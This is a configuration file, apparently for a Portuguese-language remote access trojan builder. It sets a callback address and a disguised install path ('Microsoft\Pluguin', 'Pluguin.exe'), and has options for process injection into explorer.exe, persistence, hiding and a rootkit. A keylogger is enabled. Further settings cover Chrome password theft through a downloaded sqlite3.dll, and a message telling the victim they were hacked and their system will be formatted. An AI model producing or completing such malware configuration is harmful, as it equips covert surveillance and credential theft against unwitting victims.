[settings]
endereco0=127.0.0.1|12345
endereco1=
endereco2=
endereco3=
endereco4=
endereco5=
endereco6=
endereco7=
endereco8=
endereco9=
endereco10=
endereco11=
endereco12=
endereco13=
endereco14=
endereco15=
endereco16=
endereco17=
endereco18=
endereco19=
Identificacao=Lammer
Criarserversenha=spycronic
Mostrarsenha=1
Instalarservidor=0
localinstalacao=4|c:\directory\Microsoft\Pluguin
INICIALIZACAO0={RH48B6E5YF-4UKU-71CF-AVF5-02901P6HJ002}
inicializacao1=Avgnt
inicializacao2=Avirnt
inicializacao3=Policies
Avgnt=0
Avirnt=0
activexstartup=0
policiesstartup=0
infiltrarprocesso=0
infiltrarprocessonome=explorer.exe
persistencia=0
ocultar=0
mudardata=0
Fundir=0
mutexname=Pluguin
diretorio=Microsoft
nomearquivo=Pluguin.exe
exibirmensagem=0
iconemsg=1
botaomsg=0
mensagem0=LAMMER
mensagem1=VOC?FOI HACKEADO ...SEU SISTEMA SER?FORMATADO.
keylogger0=1
keylogger1=0
keylogger2=0
keyloggerstrings0=
keyloggerstrings1=
keyloggerstrings2=
keyloggerstrings3=
keyloggerstrings4=
keyloggertimer=5
debug0=1
debug1=1
debug2=1
debug3=1
debug4=1
debug5=1
debug6=1
debug7=1
debug8=1
debug9=1
debug10=1
debug11=1
compactar=0
rootkiton=0
chromepass=0
chromepasslink=http://www.server.com/sqlite3.dll
createserverpassword=123
hklm=0
hkcu=0
melt=0
Delayed execution=0
